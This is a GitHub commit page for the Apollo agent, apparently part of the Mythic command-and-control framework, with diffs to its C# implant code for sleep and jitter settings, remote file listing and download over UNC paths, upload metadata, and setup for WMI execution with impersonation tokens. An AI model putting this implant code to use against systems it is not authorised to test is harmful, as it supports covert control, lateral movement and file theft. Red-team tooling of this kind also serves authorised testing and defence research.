Skip to content

Commit

Permalink
Updated for better ls, upload, download parsing and wmiexecute
Browse files Browse the repository at this point in the history
  • Loading branch information
@its-a-feature
its-a-feature committed Oct 16, 2024
1 parent d3e58d6 commit 2a4eee8
Show file tree
Hide file tree
Showing 10 changed files with 542 additions and 414 deletions.
10 changes: 10 additions & 0 deletions Payload_Type/apollo/CHANGELOG.MD
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,16 @@ All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).

## [v2.2.18] - 2024-10-16

### Changed

- Updated `sleep` to take named parameters
- Updated `wmiexecute` to include Evan's wmi execute with impersonation tokens work https://gist.github.com/EvanMcBroom/99ea88304faec38d3ed1deefd1aba6f9
- Updated `ls` to check for a CWD of a UNC path before returning bad data for the browser script to leverage
- Updated `upload` and `download` to also try to process a CWD of a UNC path when returning full paths for the file browser
- Added `host` field to return `upload` data to try to more accurately capture the host of where data is uploaded

## [v2.2.17] - 2024-10-04

### Changed
Expand Down
25 changes: 0 additions & 25 deletions Payload_Type/apollo/apollo/agent_code/Apollo/Program.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -30,33 +30,8 @@ class Program
private static AutoResetEvent _complete = new AutoResetEvent(false);
private static bool _completed;
private static Action<object> _flushMessages;
public enum RPC_AUTHN_LEVEL
{
PKT_PRIVACY = 6
}

public enum RPC_IMP_LEVEL
{
IMPERSONATE = 3
}

public enum EOLE_AUTHENTICATION_CAPABILITIES
{
DYNAMIC_CLOAKING = 0x40
}
[DllImport("ole32.dll")]
static extern int CoInitializeSecurity(IntPtr pSecDesc, int cAuthSvc, IntPtr asAuthSvc, IntPtr pReserved1, RPC_AUTHN_LEVEL dwAuthnLevel, RPC_IMP_LEVEL dwImpLevel, IntPtr pAuthList, EOLE_AUTHENTICATION_CAPABILITIES dwCapabilities, IntPtr pReserved3);
// we need this to happen first so we can use impersonation tokens with wmiexecute
static readonly int _security_init = CoInitializeSecurity(IntPtr.Zero, -1, IntPtr.Zero, IntPtr.Zero, RPC_AUTHN_LEVEL.PKT_PRIVACY, RPC_IMP_LEVEL.IMPERSONATE, IntPtr.Zero, EOLE_AUTHENTICATION_CAPABILITIES.DYNAMIC_CLOAKING, IntPtr.Zero);

public static void Main(string[] args)
{
// add a read to _security_init so it doesn't get optimized away in release builds
var keeper = _security_init;
if(args.Length < 0)
{
Console.WriteLine($"CoInitializeSecurity: {_security_init}");
}
//_sendAction = (object p) =>
//{
// PipeStream ps = (PipeStream)p;
Expand Down
2 changes: 2 additions & 0 deletions Payload_Type/apollo/apollo/agent_code/ApolloInterop/Structs/MythicStructs.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -1110,6 +1110,8 @@ public MessageType GetTypeCode()
public string FullPath;
[DataMember(Name = "task_id")]
public string TaskID;
[DataMember(Name = "host")]
public string Host;

public override bool Equals(object obj)
{
Expand Down
24 changes: 23 additions & 1 deletion Payload_Type/apollo/apollo/agent_code/Tasks/download.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -45,6 +45,7 @@ public override void Start()
try
{
DownloadParameters parameters = _jsonSerializer.Deserialize<DownloadParameters>(_data.Parameters);
string host = parameters.Hostname;
if (string.IsNullOrEmpty(parameters.Hostname) && !File.Exists(parameters.FileName))
{
resp = CreateTaskResponse(
Expand All @@ -58,14 +59,35 @@ public override void Start()
if (string.IsNullOrEmpty(parameters.Hostname))
{
path = parameters.FileName;
string cwd = System.IO.Directory.GetCurrentDirectory().ToString();
if (cwd.StartsWith("\\\\"))
{
var hostPieces = cwd.Split('\\');
if (hostPieces.Length > 2)
{
host = hostPieces[2];
path = $@"\\{hostPieces[2]}\{parameters.FileName}";
}
else
{
resp = CreateTaskResponse($"invalid UNC path for CWD: {cwd}. Can't determine host. Please use explicit UNC path", true, "error");
_agent.GetTaskManager().AddTaskResponseToQueue(resp);
}
}
else
{
host = Environment.GetEnvironmentVariable("COMPUTERNAME");
}

} else if (localhostAliases.Contains(parameters.Hostname.ToLower()))
{
path = parameters.FileName;
host = Environment.GetEnvironmentVariable("COMPUTERNAME");
}
else
{
path = $@"\\{parameters.Hostname}\{parameters.FileName}";

}
byte[] fileBytes = new byte[0];
fileBytes = File.ReadAllBytes(path);
Expand All @@ -85,7 +107,7 @@ public override void Start()
parameters.FileName,
out string mythicFileId,
false,
parameters.Hostname))
host))
{
resp = CreateTaskResponse(mythicFileId, true, "completed", artifacts);
}
Expand Down
22 changes: 21 additions & 1 deletion Payload_Type/apollo/apollo/agent_code/Tasks/ls.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -123,7 +123,27 @@ public override void Start()
if (string.IsNullOrEmpty(uncPath))
uncPath = ".";
if (string.IsNullOrEmpty(host))
host = Environment.GetEnvironmentVariable("COMPUTERNAME");
{
string cwd = System.IO.Directory.GetCurrentDirectory().ToString();
if (cwd.StartsWith("\\\\"))
{
var hostPieces = cwd.Split('\\');
if(hostPieces.Length > 2)
{
host = hostPieces[2];
} else
{
resp = CreateTaskResponse($"invalid UNC path for CWD: {cwd}. Can't determine host. Please use explicit UNC path", true, "error");
_agent.GetTaskManager().AddTaskResponseToQueue(resp);
return;
}
} else
{
host = Environment.GetEnvironmentVariable("COMPUTERNAME");
}

}

FileBrowser results = new FileBrowser
{
Host = host
Expand Down
40 changes: 17 additions & 23 deletions Payload_Type/apollo/apollo/agent_code/Tasks/sleep.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,11 +9,21 @@
using ApolloInterop.Classes;
using ApolloInterop.Interfaces;
using ApolloInterop.Structs.MythicStructs;
using System.Runtime.Serialization;
using static Tasks.make_token;

namespace Tasks
{
public class sleep : Tasking
{
[DataContract]
internal struct SleepParameters
{
[DataMember(Name = "interval")]
public int Sleep;
[DataMember(Name = "jitter")]
public int Jitter;
}
public sleep(IAgent agent, MythicTask data) : base(agent, data)
{
}
Expand All @@ -22,37 +32,21 @@ public sleep(IAgent agent, MythicTask data) : base(agent, data)
public override void Start()
{
MythicTaskResponse resp;
string[] parts = _data.Parameters.Split(' ');
int sleepTime = -1;
double jitterTime = -1;
if (int.TryParse(parts[0], out sleepTime))
SleepParameters parameters = _jsonSerializer.Deserialize<SleepParameters>(_data.Parameters);
if (parameters.Sleep >= 0)
{
if (parts.Length > 1 && double.TryParse(parts[1], out jitterTime))
if (parameters.Jitter >= 0)
{
resp = CreateTaskResponse("", true);
_agent.SetSleep(parameters.Sleep, parameters.Jitter);
}
else
{
resp = CreateTaskResponse("", true);
_agent.SetSleep(parameters.Sleep);
}
}
else
{
resp = CreateTaskResponse($"Failed to parse int from {parts[0]}.", true, "error");
}

resp = CreateTaskResponse("", true);
_agent.GetTaskManager().AddTaskResponseToQueue(resp);
if (sleepTime >= 0)
{
if (jitterTime >= 0)
{
_agent.SetSleep(sleepTime, jitterTime);
}
else
{
_agent.SetSleep(sleepTime);
}
}

}
}
}
Expand Down
Loading

0 comments on commit 2a4eee8

Please sign in to comment.